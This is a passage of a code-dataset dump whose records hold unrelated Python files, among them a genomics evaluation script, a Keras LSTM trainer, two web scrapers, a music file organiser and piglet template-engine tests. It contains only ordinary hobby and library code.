hl.read_table(info_split_ht_path)\n mt = mt.filter_rows(~info_ht[mt.row_key].AS_lowqual)\n\n ht = create_truth_sample_ht(mt, truth_mt, truth_hc_intervals)\n ht.write(truth_ht_path, overwrite=True)\n truth_data['ht'] = ht\n\n # Bin truth sample concordance. Merges concordance results (callset vs.\n # truth) for a given truth sample with bins from specified model\n logger.info(f'Creating binned concordance table for {truth_sample}')\n info_ht = hl.read_table(info_split_ht_path)\n ht = truth_dict[truth_sample]['ht']\n ht = ht.filter(\n ~info_ht[ht.key].AS_lowqual\n & ~hl.is_defined(hl.read_table(resources.TEL_AND_CENT_HT)[ht.locus])\n )\n\n logger.info('Filtering out low confidence regions and segdups...')\n lcr = hl.read_table(resources.LCR_INTERVALS_HT)\n segdup = hl.read_table(resources.SEG_DUP_INTERVALS_HT)\n ht = ht.filter(hl.is_missing(lcr[ht.locus]))\n ht = ht.filter(hl.is_missing(segdup[ht.locus]))\n\n logger.info(\n 'Loading HT containing RF or VQSR scores annotated with a bin based '\n 'on the rank of score...'\n )\n metric_ht = scores_ht\n ht = ht.filter(hl.is_defined(metric_ht[ht.key]))\n\n ht = ht.annotate(score=metric_ht[ht.key].score)\n\n ht = compute_binned_truth_sample_concordance(ht, metric_ht, n_bins)\n binned_concordance_ht_path = join(\n work_bucket,\n 'binned_concordance',\n f'{truth_sample}_binned_concordance.ht',\n )\n ht.write(binned_concordance_ht_path, overwrite=True)\n\n\ndef create_bin_ht(\n rf_annotations_ht: hl.Table,\n info_split_ht: hl.Table,\n n_bins: int,\n rf_results_ht: Optional[hl.Table] = None,\n vqsr_filters_split_ht: Optional[hl.Table] = None,\n) -> hl.Table:\n \"\"\"\n Creates a table with bin annotations added for a RF or VQSR run and writes it\n to its correct location in annotations.\n\n :param rf_annotations_ht: table generated by create_rf_annotations.py\n :param info_split_ht: table generated by generate_info_ht.py\n :param n_bins: Number of bins to bin the data into\n :param rf_results_ht: table generated by random_forest.py\n :param vqsr_filters_split_ht: table generated by load_vqsr.py\n :return: Table with bin annotations\n \"\"\"\n logger.info(f'Annotating model HT with bins using {n_bins} bins')\n if vqsr_filters_split_ht:\n logger.info(f'Using a VQSR model')\n\n ht = vqsr_filters_split_ht\n ht = ht.annotate(**rf_annotations_ht[ht.key])\n ht = ht.annotate(\n info=info_split_ht[ht.key].info,\n score=ht.info.AS_VQSLOD,\n positive_train_site=ht.info.POSITIVE_TRAIN_SITE,\n negative_train_site=ht.info.NEGATIVE_TRAIN_SITE,\n AS_culprit=ht.info.AS_culprit,\n )\n\n # Remove all samples with an undefined ac_raw, because ac_raw was\n # calculated on the high quality samples only, and VQSR was run before\n # sample filtering\n ht = ht.filter(hl.is_defined(ht.ac_raw))\n\n else:\n logger.info(f'Using an RF model')\n ht = rf_results_ht\n ht = ht.annotate(\n info=info_split_ht[ht.key].info,\n positive_train_site=ht.tp,\n negative_train_site=ht.fp,\n score=ht.rf_probability['TP'],\n )\n\n ht = ht.filter(\n ~info_split_ht[ht.key].AS_lowqual\n & ~hl.is_defined(hl.read_table(resources.TEL_AND_CENT_HT)[ht.locus])\n )\n ht_non_lcr = resources.filter_low_conf_regions(\n ht,\n filter_lcr=True,\n filter_segdup=True,\n )\n ht = ht.annotate(non_lcr=hl.is_defined(ht_non_lcr[ht.key]))\n bin_ht = create_binned_ht(ht, n_bins, add_substrat={'non_lcr': ht.non_lcr})\n return bin_ht\n\n\ndef create_aggregated_bin_ht(\n ht: hl.Table,\n trio_stats_ht: Optional[hl.Table],\n work_bucket: str,\n) -> hl.Table:\n \"\"\"\n Aggregates variants into bins, grouped by `bin_id` (rank, bi-allelic, etc.),\n contig, and `snv`, `bi_allelic`, and `singleton` status, using previously\n annotated bin information.\n\n For each bin, aggregates statistics needed for evaluation plots.\n :param ht: table with score bins\n :param trio_stats_ht: optional, HT generated from a FAM file\n :param work_bucket: bucket to write temporary files to\n :return: Table of aggregate statistics by bin\n \"\"\"\n\n # Count variants for ranking\n count_expr = {\n x: hl.agg.filter(\n hl.is_defined(ht[x]),\n hl.agg.counter(\n hl.cond(hl.is_snp(ht.alleles[0], ht.alleles[1]), 'snv', 'indel')\n ),\n )\n for x in ht.row\n if x.endswith('bin')\n }\n bin_variant_counts = ht.aggregate(hl.struct(**count_expr))\n logger.info(f'Found the following variant counts:\\n {pformat(bin_variant_counts)}')\n ht = ht.annotate_globals(bin_variant_counts=bin_variant_counts)\n\n # Load ClinVar pathogenic data\n clinvar_ht = hl.read_table(resources.CLINVAR_HT)\n clinvar_pathogenic_ht = filter_to_clinvar_pathogenic(clinvar_ht)\n ht = ht.annotate(clinvar_pathogenic=hl.is_defined(clinvar_pathogenic_ht[ht.key]))\n\n logger.info(f'Creating grouped bin table...')\n checkpoint_path = join(work_bucket, 'tmp', f'grouped_bin.ht')\n grouped_binned_ht = compute_grouped_binned_ht(ht, checkpoint_path=checkpoint_path)\n\n logger.info(f'Aggregating grouped bin table...')\n # Getting the source Table of the GroupedTable object\n # (\"parent\" here has nothing to do with the pedigree!)\n parent_ht = grouped_binned_ht._parent # pylint: disable=protected-access\n\n agg_ht = grouped_binned_ht.aggregate(\n n_clinvar_pathogenic=hl.agg.count_where(parent_ht.clinvar_pathogenic),\n **score_bin_agg(\n grouped_binned_ht,\n fam_stats_ht=trio_stats_ht,\n clinvar=clinvar_ht,\n truth_data=resources.get_truth_ht(),\n ),\n )\n return agg_ht\n\n\nif __name__ == '__main__':\n main() # pylint: disable=E1120\n","sub_path":"scripts/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":16283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395372744","text":"import\timportlib,\\\r\n\t\timportlib.util,\\\r\n\t\tos,\\\r\n\t\tsys,\\\r\n\t\ttime,\\\r\n\t\t\\\r\n\t\tCoreLib\r\n\r\ndef importDay(dayNum):\r\n\tmodName = 'Day{0}'.format(dayNum)\r\n\tmodSpec = importlib.util.spec_from_file_location(modName, '{0}/Days/{1}.py'.format(os.path.abspath(os.getcwd()), modName))\r\n\tdayMod = importlib.util.module_from_spec(modSpec)\r\n\tmodSpec.loader.exec_module(dayMod)\r\n\treturn getattr(dayMod, modName)()\r\n\r\ndef main(args):\r\n\t# Determine which days were requested to test.\r\n\tdayNumsToRun = args\r\n\tnumLoops = 100\r\n\tif (len(dayNumsToRun) == 0):\r\n\t\tdayNumsToRun = [i for i in range(1, 13)]\r\n\tdays = [importDay(int(day)) for day in dayNumsToRun]\r\n\r\n\t# Run the tests.\r\n\tprint('Running all tests {0} times:'.format(numLoops))\r\n\tavgTimeMS = 0\r\n\tfor day in days:\r\n\t\tavgTimeMS += day.RunTests(numLoops)\r\n\tprint('Average Total Elapsed: {0:.4f} ms'.format(avgTimeMS))\r\n\r\nif __name__ == '__main__':\r\n\tfileDir = os.path.dirname(os.path.abspath(__file__))\r\n\tcwd = os.path.abspath(os.getcwd())\r\n\tif fileDir != cwd:\r\n\t\traise AssertionError('This script\\'s working directory must be the directory where Main.py is. File path is currently {0} and working directory is {1}'.format(fileDir, cwd))\r\n\tmain(sys.argv[1:])","sub_path":"2020/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378976633","text":"import csv\r\n\r\ndef write_into_csv(info_list):\r\n with open('stud_info.csv','a', newline='') as csv_file:\r\n writer = csv.writer(csv_file)\r\n if csv_file.tell() == 0:\r\n writer.writerow([\"Name \",\"Age \",\"Mob_no \",\"Email \"])\r\n\r\n writer.writerow(info_list)\r\nif __name__ == '__main__':\r\n condition = True\r\n stud_num = 1\r\n while(condition):\r\n stud_info = input(\"Enter the Information for Student{} in following format (Name Age Mob_no Email ) \".format(stud_num))\r\n print(\"Following Information saved succesfully \" + stud_info)\r\n\r\n #split\r\n stud_info_list = stud_info.split(\" \")\r\n print(\"Entered Split up Information \" + str(stud_info_list))\r\n\r\n print(\"\\nThe Entered Information is - \\n Name: {} \\n Age:{} \\n Mob_no: {} \\n Email: {} \"\r\n .format(stud_info_list[0],stud_info_list[1],stud_info_list[2],stud_info_list[3]))\r\n choice_check = input(\"Is the entered information correct ? (yes/no) : \")\r\n\r\n if choice_check == \"yes\":\r\n write_into_csv(stud_info_list)\r\n cond_check = input(\"Enter 'yes'/'no' if You want to enter another student's data : \")\r\n if cond_check == \"yes\":\r\n condition = True\r\n stud_num = stud_num + 1\r\n elif cond_check == \"no\":\r\n condition = False\r\n elif choice_check == \"no\":\r\n print(\"Please Re-enter the information ! \")\r\n","sub_path":"school admistration project/univ_admin.py","file_name":"univ_admin.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"9148367","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport math\nimport sys\nimport numpy as np\nimport os\nimport nn_utils.network_utils as network_utils\nimport utils.config.nn_config as nn_config\nfrom keras.models import load_model\nfrom keras.callbacks import LearningRateScheduler\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.utils.visualize_util import plot\n\nglobal cur_iter\nconfig = nn_config.get_neural_net_configuration(int(sys.argv[1]))\nfreq = config['samplerate']\nbatch_size = config['batch_size']\t#Number of training examples pushed to the GPU per batch.\ninputFile = config['dataset_file']\ncur_iter = sys.argv[2]\nmodelweight_dir = config['modelweight_dir']\nmodel_filename = '%s/%s_%s_%s' % (\n\tmodelweight_dir,\n\tconfig['hidden_dimension_size'],\n\tconfig['recurrent_units'],\n\tconfig['dataset_name'])\n\nnum_iters = 10000\t\t\t\t\t#Number of iterations for training\nepochs_per_iter = 20\t\t\t\t#Number of iterations before we save our model\n\ndef loadData():\n\t#X_train is a tensor of size (num_train_examples, num_timesteps, num_frequency_dims)\n\t#Y_train is a tensor of size (num_train_examples, num_timesteps, num_frequency_dims)\n\tX_train = np.load(config['dataset_file'] + '_x.npy')\n\tY_train = np.load(config['dataset_file'] + '_y.npy')\n\tprint('Training data shape:')\n\tprint(X_train.shape)\n\tif(config['stateful']):\n\t\tprint('The network model you are loading the data for is set to be stateful.')\n\t\tlength = int(X_train.shape[0] / float(batch_size)) * batch_size\n\t\tX_train = X_train[len(X_train)-length:]\n\t\tY_train = Y_train[len(Y_train)-length:]\n\treturn X_train, Y_train\n\ndef loadmodel():\n\tif not os.path.isfile('%s_model.h5' % (model_filename)):\n\t\tmodel = network_utils.create_lstm_rnn(\n\t\tinput_shape = input_shape,\n\t\tnum_hidden_dimensions = config['hidden_dimension_size'],\n\t\tmax_hidden_dimension_size = config['max_hidden_dimension_size'],\n\t\tnum_recurrent_units = config['recurrent_units'],\n\t\tstateful = config['stateful'],\n\t\tlrate=.001)\n\telse:\n\t\tmodel = load_model('%s_model.h5' % (model_filename))\n\treturn model\n\n\"\"\"\nhttp://machinelearningmastery.com/using-learning-rate-schedules-deep-learning-models-python-keras/\t\"\"\"\ndef step_decay(epoch):\n\ttrain_progress = epochs_per_iter / float(cur_iter) + epochs_per_iter\n\tepochs_drop = 50.0 / train_progress\n\tdrop = 0.5\n\tinitial_lrate = .01 * train_progress\n\tdrop *= train_progress\n\tlrate = initial_lrate * math.pow(drop, math.floor((1+epoch)/epochs_drop))\n\tprint('Learning rate: %s' % lrate)\n\treturn lrate\n\ndef time_decay(epoch):\n\tinitial_lrate = .1\n\tlrate = initial_lrate * 1 / (1 + epoch)\n\tprint('Learning rate: %s' % lrate)\n\treturn lrate\n\ndef run_training():\n\tglobal cur_iter\n\t\n\tif not os.path.isdir(modelweight_dir):\n\t\tos.makedirs(modelweight_dir)\n\tplot_path = '%s_network_plot.png' % (model_filename)\n\tplot(model, show_shapes=True, to_file=plot_path)\n\tmodel.save('%s_model.h5' % (model_filename))\n\n\tlrate = LearningRateScheduler(time_decay)\n\tcheckpointer = ModelCheckpoint(filepath=model_filename, verbose=1)\n\tcallbacks_list = [checkpointer]\n\t\n\tprint ('Starting training!')\n\twhile cur_iter < xrange(num_iters):\n\t\tprint('Iteration: ' + str(cur_iter))\n\t\thistory = model.fit(\n\t\tX_train,\n\t\tY_train,\n\t\tbatch_size=batch_size,\n\t\tnb_epoch=epochs_per_iter,\n\t\tvalidation_split=0.0,\n\t\tshuffle=False,\n\t\tcallbacks=callbacks_list,\n\t\tverbose=1)\n\t\tcur_iter += epochs_per_iter\n\t\tmodel.save_weights(model_filename + str(cur_iter))\n\nif __name__ == '__main__':\n\t#Load up the training data\n\tprint ('Loading training data')\n\tX_train, Y_train = loadData()\n\tprint ('Finished loading training data')\n\tprint ('Learning data shape:')\n\tprint (X_train.shape)\n\t#Figure out how many frequencies we have in the data\n\tfreq_dims = X_train.shape[2]\n\tinput_shape = (batch_size, X_train.shape[1], freq_dims)\n\t\n\tprint ('Number of Frequency Dimensions: ', freq_dims, '\\nNumber of Hidden Dimensions: ', config['hidden_dimension_size'])\n\tprint ('Number of recurrent units: ', config['recurrent_units'])\n\t\n\t#Creates a lstm network\n\tmodel = loadmodel()\n\t\n\tprint ('Current iteration: ', cur_iter)\n\t\n\t#Load existing weights if available\n\tif os.path.isfile(model_filename + str(cur_iter)):\n\t\tmodel.load_weights(model_filename + str(cur_iter))\n\t\tprint ('Loaded model weights from %s' % (model_filename + str(cur_iter)))\n\telse:\n\t\tcur_iter = 0\n\t\n\trun_training()\n\n\tprint ('Training complete!')\n\texit()\t","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"172482066","text":"# CSD optimointialgoritmi\r\n# Taneli Leppänen\r\n\r\nfrom scipy.optimize import minimize\r\nfrom math import sqrt\r\nimport numpy as np\r\n\r\n\r\ndef laske_d_pituus(d):\r\n d_pituus = 0\r\n\r\n for alkio in d:\r\n d_pituus += alkio ** 2\r\n\r\n d_pituus = sqrt(d_pituus)\r\n\r\n return d_pituus\r\n\r\n\r\ndef pysayta(d, v, eps1, eps2):\r\n\r\n d_pituus = laske_d_pituus(d)\r\n\r\n if d_pituus < eps1 and v < eps2:\r\n return True\r\n\r\n else:\r\n return False\r\n\r\n\r\ndef laske_v(g_lista):\r\n\r\n v = 0\r\n\r\n for g in g_lista:\r\n\r\n if g > v:\r\n v = 0 + g\r\n\r\n return v\r\n\r\n\r\ndef laske_askel(R, x, d, v, delta, i_max):\r\n\r\n d_pituus = laske_d_pituus(d)\r\n d = d / d_pituus\r\n fitness0 = laske_fitness(x, R, v)\r\n m = 1\r\n print(\"Suunta: \" + str(d))\r\n\r\n while True:\r\n alpha = delta*(1.618**m)\r\n x1 = x + alpha*d\r\n fitness1 = laske_fitness(x1, R, v)\r\n\r\n if fitness1 > fitness0:\r\n\r\n if m < 2:\r\n m = 2\r\n\r\n break\r\n\r\n print(\"Piste = \" + str(x1))\r\n print(\"Fitness0 = \" + str(fitness0))\r\n print(\"Fitness1 = \" + str(fitness1))\r\n print(\"m = \" + str(m))\r\n print(\"Alpha = \" + str(alpha))\r\n\r\n fitness0 = 0 + fitness1\r\n m += 1\r\n\r\n input(\"Continue>\")\r\n\r\n alpha_y = delta*(1.618**m)\r\n alpha_a = delta*(1.618**(m-2))\r\n\r\n while True:\r\n vali = alpha_y - alpha_a\r\n\r\n if vali < i_max:\r\n return alpha_a\r\n\r\n a = vali*(1 - 0.618)\r\n b = vali*0.618\r\n\r\n fitness_a = laske_fitness((x + d*(alpha_a + a)), R, v)\r\n fitness_b = laske_fitness((x + d*(alpha_a + b)), R, v)\r\n\r\n if fitness_a < fitness_b:\r\n alpha_y = alpha_a + b\r\n\r\n else:\r\n alpha_a = alpha_a + a\r\n\r\n\r\ndef laske_d(x, g_arvot, nvars):\r\n\r\n g1 = [(1/(4*x[0]*x[1])) - ((x[0] + x[1])/(4*(x[0]**2)*x[1])),\r\n (1 / (4 * x[0] * x[1])) - ((x[0] + x[1]) / (4 * (x[1] ** 2) * x[0])),\r\n ]\r\n\r\n g2 = [(1 / (4 * x[0] * x[1])) - ((x[0] - x[1]) / (4 * (x[0] ** 2) * x[1])),\r\n (- 1 / (4 * x[0] * x[1])) - (x[0] - x[1]) / (4 * x[0] * (x[1] ** 2))\r\n ]\r\n\r\n c = np.array([3109888511975475/2199023255552, 3109888511975475/2199023255552])\r\n b = np.array(g_arvot)\r\n A = np.array([])\r\n\r\n\r\ndef paivita(x, d, alph):\r\n x = x + alph*d\r\n return x\r\n\r\ndef laske_rajoitusrikkomat(x):\r\n\r\n cons = [((2 * (2 ** 0.5) * 1000 * (x[0] + x[1]) * 10000) /\r\n (210000 * (4 * x[0] * x[1]) + 4 * x[0] * x[1])) - 0.5,\r\n ((2 * (2 ** 0.5) * 1000 * (x[0] - x[1]) * 10000) /\r\n (210000 * (4 * x[0] * x[1]))) - 1\r\n ]\r\n\r\n print(cons)\r\n\r\n return cons\r\n\r\ndef laske_fitness(x, R, v):\r\n\r\n fitness = (2**0.5)*1000*(x[0] + x[1])\r\n\r\n fitness += R*v\r\n\r\n return fitness\r\n\r\n\r\ndef main():\r\n\r\n nvars = 2\r\n x0 = [180, 180]\r\n eps1 = 0.01\r\n eps2 = 0.01\r\n R = 1000000\r\n delta = 10\r\n i_max = 0.01\r\n\r\n iter_max = 10\r\n\r\n x = x0\r\n\r\n for k in range(iter_max):\r\n\r\n g_arvot = laske_rajoitusrikkomat(x)\r\n v = laske_v(g_arvot)\r\n d = laske_d(x, g_arvot, nvars)\r\n\r\n if pysayta(d, v, eps1, eps2):\r\n print(\"Optimi pisteessa: \" + str(x) + \"\\n\" + \"Kierroksella: \" + str(k))\r\n break\r\n\r\n alpha = laske_askel(R, x, d, v, delta, i_max)\r\n x = paivita(x, d, alpha)\r\n\r\n\r\nmain()","sub_path":"csd_kultainen3.py","file_name":"csd_kultainen3.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"185228071","text":"\"\"\"\nTitle: Daily Cal Web Scraper\n\nDescription: Web scraper for the Daily Californian newspaper that provides headlines,\npublishing dates, and authors for recent articles.\n\nAuthor: Francis Indaheng\n\nDate: June 6, 2019\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n# web page to be scraped\nurl = \"https://www.dailycal.org/section/news/\"\n\n# create a GET request to the web page\nhtml = requests.get(url)\n\n# log request status\nrequest_status = \"Success\"\nif html.status_code != 200:\n\trequest_status = \"Error\"\nprint(f\"Request status code: {request_status}\")\n\n# soupify the html content\nsoup = BeautifulSoup(html.content, \"lxml\")\n\n# find html wrapped by

tag -> indicates section title\ntitle = soup.find(\"h2\", {\"class\":\"section-title\"})\n\n# find news articles in section\narticles_arr = soup.find_all(\"a\", {\"rel\":\"bookmark\"})\n\n# log section content\nprint(f\"Section: {title.text[1:]}\") # sliced title.text to remove observed newline\nfor article in articles_arr:\n\tprint(f\"\\t{article.text}\")\nprint()\n\ndef scrape_article(article):\n\turl = article.attrs[\"href\"]\n\n\thtml = requests.get(url)\n\tsoup = BeautifulSoup(html.content, \"lxml\")\n\n\ttitle = soup.find(\"h2\", {\"class\":\"entry-title\"}).text\n\tdate = soup.find(\"time\", {\"class\":\"entry-date\"}).text\n\tauthor = soup.find(\"a\", {\"rel\":\"author\"}).text\n\tcontent = soup.find(\"div\", {\"class\":\"entry-content\"}).text\n\n\treturn (title, date, author, content[:250]) # truncate content if more than 250 words\n\nif __name__ == \"__main__\":\n\tprint(\"Title, Date, Author, Content (truncated)\\n\")\n\n\tfor article in articles_arr:\n\t\tscraped_data = scrape_article(article)\n\t\tfor data in scraped_data:\n\t\t\tprint(data)\n\t\tprint()\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"107338322","text":"import os\nimport shutil\nimport tkinter as tk\nimport tkinter.filedialog as filedialog\nfrom pathlib import Path\n\nfrom mutagen import aiff, easyid3, flac\n\nimport config\nfrom concurrent import futures\n\n\ndef make_dist_path(tag):\n if isinstance(tag, aiff.AIFF):\n try:\n artist = ','.join(tag[\"TPE1\"].text).replace(\"/\", \"・\")\n album = ','.join(tag[\"TALB\"].text).replace(\"/\", \"・\")\n return Path(artist + os.sep + album)\n except:\n print(\"必要なタグ情報がたりません\")\n return None\n else:\n try:\n artist = ','.join(tag[\"artist\"]).replace(\"/\", \"・\")\n album = ','.join(tag[\"album\"]).replace(\"/\", \"・\")\n return Path(artist + os.sep + album)\n except:\n print(\"必要なタグ情報がたりません\")\n return None\n\n\ndef tag_scanner(music_path):\n if music_path.suffix == \".aiff\" or music_path.suffix == \".aif\":\n return aiff.AIFF(music_path)\n elif music_path.suffix == \".flac\":\n return flac.FLAC(music_path)\n elif music_path.suffix == \".mp3\":\n return easyid3.EasyID3(music_path)\n else:\n print(\"Invalid FileType\")\n\n\nclass MusicTransfer:\n def __init__(self):\n self.cf = config.Config()\n self.new_music = filedialog.askopenfilenames()\n self.new_music = list(map(Path, self.new_music))\n self.new_music_tags = [tag_scanner(music) for music in self.new_music]\n # self.dist_path = [make_dist_path(tag) for tag in self.new_music_tags]\n self.dist_path = []\n\n def move_files(self):\n for music, path in zip(self.new_music, self.dist_path):\n\n player_dist = self.cf.player_main_path.joinpath(path)\n if not player_dist.exists():\n os.makedirs(player_dist)\n\n backup_dist = self.cf.backup_path.joinpath(path)\n if not backup_dist.exists():\n os.makedirs(backup_dist)\n\n with futures.ThreadPoolExecutor(max_workers=4) as e:\n e.submit(shutil.copy2, music, player_dist)\n e.submit(shutil.copy2, music, backup_dist)\n\n def btn_clicked(self):\n for i, e in enumerate(entries):\n if e.get() != \"\":\n self.dist_path.append(Path(e.get()))\n else:\n self.dist_path.append(make_dist_path(self.new_music_tags[i]))\n\n self.move_files()\n\n\ndef main():\n mt = MusicTransfer()\n # mt.move_files()\n\n root = tk.Tk()\n root.title(\"Music Transfer\")\n\n frame1 = tk.Frame(root)\n frame2 = tk.Frame(root)\n frame1.pack()\n frame2.pack()\n\n labels = []\n header1 = tk.Label(frame1, text=\"曲名\")\n header2 = tk.Label(frame1, text=\"出力先\")\n\n header1.grid(row=0, column=0)\n header2.grid(row=0, column=1)\n\n for nm in mt.new_music:\n labels.append(tk.Label(frame1, text=nm.stem))\n for i, label in enumerate(labels):\n label.grid(row=i + 1, column=0)\n\n global entries\n entries = []\n for i in range(len(labels)):\n entries.append(tk.Entry(frame1))\n for i, entry in enumerate(entries):\n entry.grid(row=i + 1, column=1)\n\n button = tk.Button(frame2, text=\"実行\", command=mt.btn_clicked)\n button.pack(anchor=\"e\")\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MusicTransfer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"445075330","text":"import re\nfrom bs4 import BeautifulSoup\nimport requests\n# from gt import links\nimport csv\n\nurl = 'https://www.sanfoundry.com/1000-electronic-devices-circuits-questions-answers/'\np = requests.get(url)\ns = BeautifulSoup(p.text, 'html.parser') \naLink = s.find('div',{'class':'entry-content'})\nlinks = {bLink.text:bLink['href'] for bLink in aLink.find_all('a')}\n\n\nfor a,b in links.items():\n page = requests.get(b)\n soup = BeautifulSoup(page.text, 'html.parser')\n i = soup.find('div',{'class':'entry-content'})\n for x in i.find_all('p'):\n try:\n y = str(x).replace('\\n','')\n question = re.search('^

\\d.*?', str(y)).group()\n # print(question)\n que = re.search('^

\\d.*?
a[)]',question).group()[3:-7]\n l = re.search('
a[)].*?
')\n choices = '

'+'
'.join(l)+'
'\n m = re.search('Answer: \\w+',question).group()[-1]\n # print(l)\n if m == 'a': ans = l[0]\n elif m == 'b': ans = l[1]\n elif m == 'c': ans = l[2]\n elif m == 'd': ans = l[3]\n elif m == 'e': ans = l[4]\n expl = re.search('Explanation: .*',question).group()[:-6]\n # print(que)\n # print(len(choices))\n # print(ans)\n print(expl)\n with open('elecdev.csv', 'a', encoding='utf-8') as csvfile:\n print([que, choices, ans, expl, a, b])\n writer = csv.writer(csvfile)\n writer.writerow([que, choices, ans, expl, a, b])\n except AttributeError: continue\n except IndexError: continue\n","sub_path":"sanf_final.py","file_name":"sanf_final.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"637502389","text":"# encoding=UTF-8\n#\n# Copyright 2016 Oliver Cope\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ast\nimport re\nimport sys\n\nimport astunparse\nimport pytest\n\nfrom piglet.exceptions import PigletError\nfrom piglet.template import Template\nfrom piglet.loader import TemplateLoader\nfrom piglet.test_loader import create_templates\nimport piglet.compile\n\n\ndef normspace(s):\n return re.sub(r\"\\s+\", \" \", s, re.S).strip()\n\n\nclass TestTemplate:\n def test_it_outputs_simple_template(self):\n t = Template(\"$a\").render({\"a\": \"foo\"})\n assert t == \"foo\"\n\n def test_it_compiles_pyimport(self):\n \"\"\"\n py:import is hoisted to module level, meaning the template + loader\n machinery must already be installed at compile time\n \"\"\"\n with create_templates(\n [\n (\"a\", u'a says ${b.hello()}'),\n (\"b\", u'hello world!'),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"a\").render({}) == \"a says hello world!\"\n\n def test_builtins_are_accessible(self):\n t = Template(\"${list(enumerate(range(2)))}\").render({})\n assert t == \"[(0, 0), (1, 1)]\"\n\n def test_it_compiles_an_empty_template(self):\n assert Template(\"\").render({}) == \"\"\n\n def test_it_compiles_if_node(self):\n t = Template(\n \"moo\" \"woof\"\n )\n assert t.render({\"animal\": \"cow\"}) == \"moo\"\n assert t.render({\"animal\": \"dog\"}) == \"woof\"\n\n def test_it_attaches_else_to_the_right_node(self):\n t = Template(\n \"moo\"\n \"woof\"\n \"bu-bu-bu\"\n )\n assert t.render({\"animal\": \"dog\", \"wishes\": \"dishes\"}) == \"woof\"\n assert t.render({\"animal\": \"dog\", \"wishes\": \"fishes\"}) == \"woofbu-bu-bu\"\n assert t.render({\"animal\": \"cow\", \"wishes\": \"dishes\"}) == \"moo\"\n assert t.render({\"animal\": \"cow\", \"wishes\": \"fishes\"}) == \"moobu-bu-bu\"\n\n def test_it_parses_escaped_symbols(self):\n t = Template(\n 'wow!'\n 'try harder'\n 'meh.'\n )\n\n assert t.render({\"score\": 10}) == \"wow!\"\n assert t.render({\"score\": 5}) == \"meh.\"\n assert t.render({\"score\": 0}) == \"try harder\"\n\n def test_it_escapes_interpolations(self):\n t = Template(\"$foo\")\n assert t.render({\"foo\": \"\"}) == \"<html>\"\n\n def test_it_doesnt_escape_pling_interpolations(self):\n t = Template(\"$!foo\")\n assert t.render({\"foo\": \"\"}) == \"\"\n t = Template(\"$!{foo}\")\n assert t.render({\"foo\": \"\"}) == \"\"\n\n def test_it_compiles_for_node(self):\n t = Template('$x ')\n s = t.render({\"xyzzy\": [\"plugh\", \"plover\", \"an old mattress\"]})\n assert s == \"plugh plover an old mattress \"\n\n def test_it_compiles_pychoose_with_choose_test(self):\n t = Template(\n '

'\n \"You have \"\n 'none'\n 'only one'\n \"lots\"\n \" and lots\"\n \"

\"\n )\n assert t.render({\"i\": 0}) == \"

You have none

\"\n assert t.render({\"i\": 1}) == \"

You have only one

\"\n assert t.render({\"i\": 2}) == \"

You have lots and lots

\"\n\n def test_it_compiles_pychoose_without_choose_test(self):\n t = Template(\n '

'\n \"You have \"\n 'none'\n 'only one'\n \"lots\"\n \" and lots\"\n \"

\"\n )\n assert t.render({\"i\": 0}) == \"

You have none

\"\n assert t.render({\"i\": 1}) == \"

You have only one

\"\n assert t.render({\"i\": 2}) == \"

You have lots and lots

\"\n\n def test_it_compiles_pycontent(self):\n t = Template('' '

y

')\n assert t.render({\"xs\": range(3)}) == \"

1

2

3

\"\n\n def test_it_compiles_pywith(self):\n t = Template('${x}${y}${z}')\n assert t.render({\"y\": 5}) == \"551\"\n\n t = Template('$x')\n assert t.render({\"y\": 5}) == \"6\"\n\n def test_it_compiles_python_pi(self):\n t = Template(\"\")\n a = []\n assert t.render({\"foo\": a.append}) == \"\"\n assert a == [\"whoa nelly!\"]\n\n def test_it_compiles_pi(self):\n t = Template('')\n assert t.render({}) == ''\n\n def test_it_compiles_pydef(self):\n t = Template(\n ''\n \"

$x

\"\n \"
\"\n '${form(\"hello world\")}'\n )\n\n assert t.render({}) == \"

hello world

